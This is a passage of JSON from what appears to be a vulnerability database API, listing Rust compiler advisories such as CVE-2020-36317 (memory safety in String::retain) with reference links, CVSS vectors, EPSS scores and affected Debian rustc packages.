":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36323"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=1950396","reference_id":"1950396","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=1950396"},{"reference_url":"https://security.archlinux.org/AVG-1801","reference_id":"AVG-1801","reference_type":"","scores":[{"value":"Medium","scoring_system":"archlinux","scoring_elements":""}],"url":"https://security.archlinux.org/AVG-1801"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:3042","reference_id":"RHSA-2021:3042","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:3042"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:3063","reference_id":"RHSA-2021:3063","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:3063"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/994783?format=json","purl":"pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-ehdy-7aak-r3bt"},{"vulnerability":"VCID-qj1y-b8m1-hyfm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2"}],"aliases":["CVE-2020-36323"],"risk_score":3.7,"exploitability":"0.5","weighted_severity":"7.4","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wpe1-jr23-duhh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/80831?format=json","vulnerability_id":"VCID-y25s-c64z-57a6","summary":"rust: memory safety violation in String::retain()","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36317.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36317.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-36317","reference_id":"","reference_type":"","scores":[{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50792","published_at":"2026-04-01T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.5083","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50862","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.5087","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50847","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50873","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50831","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50888","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50886","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50928","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50907","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.5089","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50934","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50914","published_at":"2026-04-21T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-36317"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36317","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36317"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=1949189","reference_id":"1949189","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=1949189"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803","reference_id":"986803","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803"},{"reference_url":"https://security.archlinux.org/AVG-1804","reference_id":"AVG-1804","reference_type":"","scores":[{"value":"Medium","scoring_system":"archlinux","scoring_elements":""}],"url":"https://security.archlinux.org/AVG-1804"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:1935","reference_id":"RHSA-2021:1935","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:1935"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:2243","reference_id":"RHSA-2021:2243","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:2243"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/994783?format=json","purl":"pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-ehdy-7aak-r3bt"},{"vulnerability":"VCID-qj1y-b8m1-hyfm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2"}],"aliases":["CVE-2020-36317"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y25s-c64z-57a6"}],"fixing_vulnerabilities":[],"risk_score":"4.4","resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.48.0%252Bdfsg1-2"}